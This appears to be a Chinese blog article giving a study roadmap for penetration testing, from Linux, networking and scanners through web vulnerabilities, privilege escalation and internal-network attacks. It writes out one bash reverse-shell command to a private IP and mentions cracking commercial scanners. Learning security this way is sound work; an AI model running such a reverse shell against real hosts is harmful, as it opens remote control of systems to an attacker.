网络安全系统安全web安全学习思路
发布时间:2022-12-23 12:59:30 所属栏目:安全 来源:
导读: 网络安全系统安全和web安全的区别是什么?
网络安全指在计算机在联网状态下使用网络传输交互时的安全(一般来说包括操作系统和web),系统安全一般指操作系统的安全(Linux Windows主机安全),web安全就
网络安全指在计算机在联网状态下使用网络传输交互时的安全(一般来说包括操作系统和web),系统安全一般指操作系统的安全(Linux Windows主机安全),web安全就
|
网络安全系统安全和web安全的区别是什么? 网络安全指在计算机在联网状态下使用网络传输交互时的安全(一般来说包括操作系统和web),系统安全一般指操作系统的安全(Linux Windows主机安全),web安全就是网站安全(包括中间件,前后端,数据库)。 也就是安全被分为两大类,web安全和主机安全,其中web安全占比非常大,主机安全占比较小。 但不论是web安全还是主机安全,最终目的都是拿到主机权限,只是早期时,目标以操作系统软件居多,这可以直接拿最高账户权限,但是在发展过程中防火墙技术改变了格局,攻击者的目光也渐渐的转移到了web服务上面。 当前网络安全现状 当前网络安全经过多年的沉淀,已经集成了很多套工具预防攻击了,只是工具只能防御常见攻击手段,逻辑漏洞基本防不了,你所学的也许都会被防火墙拦截,你可以寻找绕过方法,只是这个太难而阻断了大多数人对这行业的兴趣 现在从事红队的人员比较少,因为红队的渗透测试服务对于企业来说并不赚钱,真正赚钱的是防御设备,并不是服务,也就是蓝队这边所做的防御产品,网络安全公司人员基本大多数时间在搞防御设备的建设运营,堡垒机,探针,蜜罐,防火墙,杀软,告警分析等,因为他们想让客户认识到自己的防御设备,出售自身产品,才能带来利润,据听说就一个设备的价格是100W,而红队最常出现在HW阶段,仅仅是做测试服务,红队很少有产品可以出售。 网络安全从哪里开始学习呢? 建议先从web安全学起 之后走主机安全(如何拿下一个linux,windows主机) 最后是代码审计和hack编程。 网络安全学习路线 vmware虚拟机,建议安装centos作web服务器,windows7作靶机,kali做攻击机 vm虚拟机最重要的要搞懂vmnet0(网桥),vmnet1(仅主机),vmnet8(NAT)的区别 学习linux常用命令,开机引导过程,一切皆文件思想,压缩解压,vim的使用,nc命令(就是网络socket监听与连接),shell概念,重定向,账号权限,软件安装与升级,内核中文件描述符的概念(本质是c语言结构体),/etc/passwd和/etc/shadow文件 有一句命令叫反弹shell命令:bash -i >& /dev/tcp/192.168.1.10/端口号 0>&1,这里面用到的知识点有bash参数,重定向,/dev/tcp目录的作用,socket连接原理,文件描述符 最后可以选择性学习一下docker,常用来搭建靶场 计算机网络 包括网络分类,通信协议,OSI参考模型,IP地址,路由(一般学路由概念,路由表),TCP/IP协议栈,端口与服务(一个端口对应一个服务,关闭了服务也就关闭了对应的端口) loT协议Industrial Control协议VoIP协议VPN/Security协议Microsoft协议IBM协议基本全被淘汰,只留下了TCP/IP协议和OSI参考模型,所以网络中TCP/IP协议很重要,TCP状态转换图很重要 常见服务 FTP,Telnet,ssh,DNS,DHCP,SMTP,SNMP等等,要学会这些服务含义,以及历史上出现的重大漏洞,以及可能存在什么漏洞,能进行复现最好 最后重要的是能够自己搭建出一个网站,靶场中最常见的网站架构是linux+apache+php+mysql,要搞清其中的关系,修改apache配置让网站支持php,修改php配置让网站支持mysql 中间件:apache,nginx,tomcat,iis 搞清他们的区别都是什么,nginx的反向代理功能是最重要的 扫描器和工具 nmap(端口扫描器)直接nmap -h命令就可以查看对应帮助常用参数有,-Pn,-p,-A,-T,-v,-O,-sn,导出报告,NSE脚本扫描 nessus(主机漏洞扫描器)这个软件破解方式非常麻烦,破解两天都是很正常的,学会使用扫描器扫描主机,导出报告即可,漏洞验证可以搜索报告中的CVE号或关键字进行验证 appscan(web扫描器)此软件是IBM开发的,误报率比较高,通常在windows主机上安装使用 awvs(web扫描器的神器)需要安装破解,最常用的web漏洞扫描工具,扫描结果数量较多较准确,含有爬虫功能 xray(长亭科技开发的web扫描器)使用方式是命令行,扫描出的结果数量中等,配合burpsuite做登录扫描最好用。也可以配合其他工具以爬虫方式扫描,爬的越多扫的越多,rad,awvs burpsuite 安全人员必备抓包神器,拦截数据包改包,重放,web弱口令爆破,扫描插件还可以做web漏洞扫描 编程基础 html,javascript 这两个能看懂基本语法即可 java 要求能理解web前后端交互执行原理,mvc架构 python 最常用的是爬虫模块,最常用来编写辅助工具使用 数据库(mysql,mssql,oracle,redis)要学习基本sql语句语法,union查询,学习sql注入的前提条件 后端语言:php,java,python 后端框架:thinkphp,spring,Django 渗透测试基础 HTTP协议 请求方法,get post put trace 响应状态码 URL和URI 网站从域名-》ip-》服务器-》前端-》后端-》数据库执行原理 肉鸡,木马,挂马,后门,端口,crack,poc,exp,vul,cve,0day概念 渗透测试定义流程系统安全,类型(黑盒白盒灰盒) 内网渗透和外网渗透概念 信息搜集渗透测试头等重要的一环,也有可能到快结束了仍然在做信息搜集,方法有google,zoomeye,Shodan,goby,whois查询,DNS,社工,描绘出目标系统的网络结构,如公司网络所在区域,子公司IP地址分布,VPN接入地址等,端口服务,目录扫描(wwwscan) 流程大致可分为: 信息搜集-》漏洞发现-》漏洞利用-》提权-》内网渗透-》痕迹清除-》输出报告 owasp10 是一个组织,最重要的项目之一是“Web 应用的十大安全隐患” 常见漏洞复现 这时候你需要一些靶场,就像上战场的军人一样,要做真实训练 sql注入,可以使用sqlilabs靶场 XSS,可以使用xsslabs靶场(xss三种类型反射型,dom型,存储型)此漏洞一般配合csrf漏洞进行利用 文件上传,可以使用uploadlabs靶场 apache和nginx解析漏洞,找低版本的复现 csrf概念理解,会复现即可 ssrf概念理解,尽量能复现 代码注入 理解原理,能做复现 越权 此类漏洞在很多大型网站均可能存在,扫描器也扫描不到,一般是手工挖掘 信息泄露 源代码泄露,报错中间件版本泄露等 文件包含 理解原理,要会使用远程文件包含,本地文件包含 命令执行,非常危险的漏洞,可以远程执行任意命令控制服务器 任意文件读取,目录遍历 理解原理,如何读取/etc/passwd文件 java反序列化 XML外部实体注入(XXE漏洞) GNU Bash代码执行 Open SSL心脏出血漏洞 Centreon v19.04远程代码执行 Wordpress 4.6 任意命令执行(CVE-2016-10033) 远程桌面代码执行漏洞(CVE-2019-0708) 永恒之蓝漏洞(MS17-010) Apache Shiro RememberMe 1.2.4 反序列化漏洞 fastjson1.2.47反序列化漏洞 Struts2 S2-061 远程命令执行 综合靶场:DVWA,metasploitable2,webbug,pikachu 工具类 metasploit 渗透测试漏洞利用神器,集成很多常用模块 cobaltstrike 内网渗透神器,以服务端和客户端的方式运行,常用于组织作战,现在很少单兵作战了 hydra 在线暴力破解工具,支持五十多种协议,ssh,ftp,rlogin,postgresql,vnc等 fority 代码审计工具 逻辑漏洞挖掘 此漏洞工具扫不出来,必须手工寻找 弱口令,暴力破解,验证码问题(前端可读,前端可控,前端验证,可重复使用,业务数据和验证码分别提交,验证码不生效,验证码未绑定用户),任意用户名密码修改,重置凭证未校验,越权,数据遍历,订单金额修改,本地验证绕过,修改接收手机或邮箱 提权 直接提权,Windows本地溢出提权,Radmin提权,VNC提权,pcAnyWhere提权,Serv-U提权,UDF提权,MOF提权,xp_cmdshell执行命令提权,sp_oamethod和wscript.shell执行命令提权,access的沙盒模式执行命令提权,xp_makecab和xp_unpackcab创建后门提权,sp_oamethod和FSO创建SHIFT后门提权,xp_regwrite进行映像劫持提权,FileZilla Server提权,内网端口转发,本地溢出提权,脏牛漏洞提权,Linux sudo root权限绕过漏洞,Linux 本地提权(CVE-2019-13272),Windows本地提权漏洞(CVE-2018-8120) 内网渗透 隧道技术介绍、bash反弹shell curl反弹shell python反弹shell ssh正向/反向代理 ssh-socker5代理 GPP攻击利用 WEB渗透实战 MS14-068攻击技术 烂土豆提权 密码喷洒攻击 Cobalt Strike流量加密 内网渗透实战 渗透测试整理 信息搜集-》漏洞扫描-》手工挖掘-》漏洞验证-》编写报告-》提出修复建议 重点在于接口测试和逻辑漏洞,这一点扫描器扫不到,防火墙也难防 渗透测试不能只看病不开药 基本到这里你可以有基本的工作技能,可以尝试打CTF,去src众测网站挖掘漏洞,挖的漏洞越是高危,赏金越多 做完以上这些,找个工作是没问题的,如果往高级进阶可以做代码审计和hack编程。 (编辑:拼字网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐